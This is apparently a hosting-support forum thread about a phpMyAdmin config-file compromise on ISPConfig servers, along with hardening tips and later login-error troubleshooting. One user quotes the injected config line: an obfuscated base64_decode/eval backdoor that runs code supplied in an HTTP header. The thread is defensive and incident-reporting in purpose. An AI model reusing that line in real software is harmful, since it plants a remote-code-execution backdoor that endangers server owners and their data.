Due to the nature of the attack, I think chown to root and chmod to 444 will do the trick. What do you you think?
Remove /usr/share/phpmyadmin/scripts/ if you have it. That will stop this exploit. If you want to feel more secure.. you can do this: Code: nano /usr/share/phpmyadmin/.htaccess Paste: Code: <Files "config.inc.php"> Order allow,deny Deny from all </Files> and save. Try to access your file: http://www.yourdomain/phpmyadmin/config.inc.php White page = Not ok. 403 Forbidden = Great!
I did already add the .htaccess to it today, but now I also deleted the /scripts dir How should the line in /var/lib/phpmyadmin/config.inc.php look? The phpinfo(); part does not look correct!
My line has been changed for some reason. It now reads: $cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy'; Whatta heck?? I lost my original config file now. How could I get it back?
By the way, the only valid line in /var/lib/phpmyadmin/config.inc.php is now: $i = 0; And phpmyadmin works without problems again.
the /usr/share/phpmyadmin/scripts directory recreated after update. the .htaccess in /usr/share/phpmyadmin/ not working for me, got white page only. i edited the /etc/phpmyadmin/apache.conf and now i get 403 forbidden. Code: # phpMyAdmin default Apache configuration Alias /phpmyadmin /usr/share/phpmyadmin <Directory /usr/share/phpmyadmin> Options Indexes FollowSymLinks DirectoryIndex index.php [B] [COLOR=Red] <Files config.inc.php> Order allow,deny Deny from all </Files>[/COLOR][/B] # Authorize for setup <Files setup.php> [B] [COLOR=Red] Order allow,deny Deny from all[/COLOR][/B] # For Apache 1.3 and 2.0 <IfModule mod_auth.c> AuthType Basic AuthName "phpMyAdmin Setup" AuthUserFile /etc/phpmyadmin/htpasswd.setup </IfModule> # For Apache 2.2 <IfModule mod_authn_file.c> AuthType Basic AuthName "phpMyAdmin Setup" AuthUserFile /etc/phpmyadmin/htpasswd.setup </IfModule> Require valid-user </Files> <IfModule mod_php4.c> AddType application/x-httpd-php .php php_flag magic_quotes_gpc Off php_flag track_vars On php_flag register_globals Off php_value include_path . </IfModule> <IfModule mod_php5.c> AddType application/x-httpd-php .php php_flag magic_quotes_gpc Off php_flag track_vars On php_flag register_globals Off php_value include_path . </IfModule> </Directory> need reload or restart the apache after edit Code: /etc/init.d/apache2 reload or /etc/init.d/apache2 restart
Cookies I also had that error "1045 - Access denied for user" when trying to login to phpMyAdmin after modifying a database username through ISPConfig. In my case, it wasn't that past phpMyAdmin vulnerability, and simply deleting cookies solved it. Anyhow, it's advisable to follow this howto or similar: Protect phpMyAdmin On An ISPConfig 3 Server (Debian)
#1045 Cannot log in to the MySQL server Hi Ive installed ISPconfig3 on Debian Squeeze on a dedicated server with 3 available IP's and everything works fine except for phpmyadmin. When I create a database I can access phpmyadmin from the ISPconfig panel by clicking the connection to phpmyadmin from the sites/database interface, but I cannot login with the username and password I just set up. I can login to mysql server from command line by doing -u root -p so mysql server is running Any ideas how to start fault tracing?
[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php# [Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php# If I run show databases; from mysql command line logged in via SSH I can see the databases that I make in ISPconf3 panel,